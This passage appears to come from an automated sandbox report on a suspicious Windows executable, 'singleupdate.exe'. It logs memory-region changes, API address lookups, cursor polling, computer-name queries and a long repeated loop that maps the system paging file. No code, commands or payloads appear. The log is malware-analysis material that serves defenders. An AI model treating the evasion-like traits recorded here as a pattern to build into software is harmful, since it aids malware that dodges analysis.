| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00410838 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00413074 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0042A5C8 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x0042B67C, 0x0042CC58 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00423564, 0x00429864 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00414000 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00420000, 0x0041FA70, ... |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00415904 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00416000 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Content Changed | - | 32-bit | 0x00426B84 |
|
|
|
| singleupdate.exe | 0x00400000 | 0x004BFFFF | Process Termination | - | 32-bit | - |
|
|
|
Threads
Thread 0x7f0
1855
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, address_out = 0x74f97060 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsAlloc, address_out = 0x74f9bea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsSetValue, address_out = 0x74f92550 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-synch-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = InitializeCriticalSectionEx, address_out = 0x74f97060 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-fibers-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsAlloc, address_out = 0x74f9bea0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsGetValue, address_out = 0x74f870c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsSetValue, address_out = 0x74f92550 |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| Module | Load | module_name = api-ms-win-core-localization-l1-2-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LCMapStringEx, address_out = 0x74f7ed00 |
|
1 | |
| Module | Get Filename | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, file_name_orig = C:\Users\FD1HVy\Desktop\singleupdate.exe, size = 261 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AreFileApisANSI, address_out = 0x75ea4280 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75e90000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitOnceExecuteOnce, address_out = 0x74f95550 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreW, address_out = 0x75efeb90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileInformationByHandleEx, address_out = 0x75ea43d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFileInformationByHandle, address_out = 0x75eff110 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTimePreciseAsFileTime, address_out = 0x75eff1e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeConditionVariable, address_out = 0x77c13a00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeConditionVariable, address_out = 0x77c88c50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WakeAllConditionVariable, address_out = 0x77c18a90 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableCS, address_out = 0x7500fca0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeSRWLock, address_out = 0x77c13a00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AcquireSRWLockExclusive, address_out = 0x77bf58e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TryAcquireSRWLockExclusive, address_out = 0x77c72ce0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseSRWLockExclusive, address_out = 0x77bf83a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SleepConditionVariableSRW, address_out = 0x7500fcf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThreadpoolWork, address_out = 0x75ea6db0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SubmitThreadpoolWork, address_out = 0x77bfeb00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseThreadpoolWork, address_out = 0x77bfed50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CompareStringEx, address_out = 0x75ea7050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLocaleInfoEx, address_out = 0x75ea7190 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LCMapStringEx, address_out = 0x75ea7480 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-string-l1-1-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = CompareStringEx, address_out = 0x74f62c20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = EnumSystemLocalesEx, address_out = 0x74f63a60 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-datetime-l1-1-1, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetDateFormatEx, address_out = 0x74fd9b40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetLocaleInfoEx, address_out = 0x74f8f170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetTimeFormatEx, address_out = 0x74fd9e10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = GetUserDefaultLocaleName, address_out = 0x74f94220 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = IsValidLocaleName, address_out = 0x74f8ed60 |
|
1 | |
| Module | Load | module_name = api-ms-win-core-localization-obsolete-l1-2-0, base_address = 0x74ea0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LCIDToLocaleName, address_out = 0x74f8da50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = LocaleNameToLCID, address_out = 0x74f6bac0 |
|
1 | |
| COM | Create | interface = A95664D2-9614-4F35-A746-DE8DB63617E6, cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| System | Get Cursor | x_out = 1334, y_out = 612 |
|
845 | |
| System | Get Time | type = Local Time, time = 2019-04-12 11:17:22 (Local Time) |
|
1 | |
| System | Get Cursor | x_out = 1334, y_out = 612 |
|
2 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernelbase.dll, function = FlsGetValue, address_out = 0x74f870c0 |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
67 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77bb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = memcpy, address_out = 0x77c27b00 |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
| File | Create | filename = g, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_RANDOM_ACCESS, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = System Paging File, type = size |
|
1 | |
| Module | Create Mapping | filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Module | Unmap | process_name = c:\users\fd1hvy\desktop\singleupdate.exe |
|
1 | |
| System | Get Computer Name | result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS |
|
1 | |
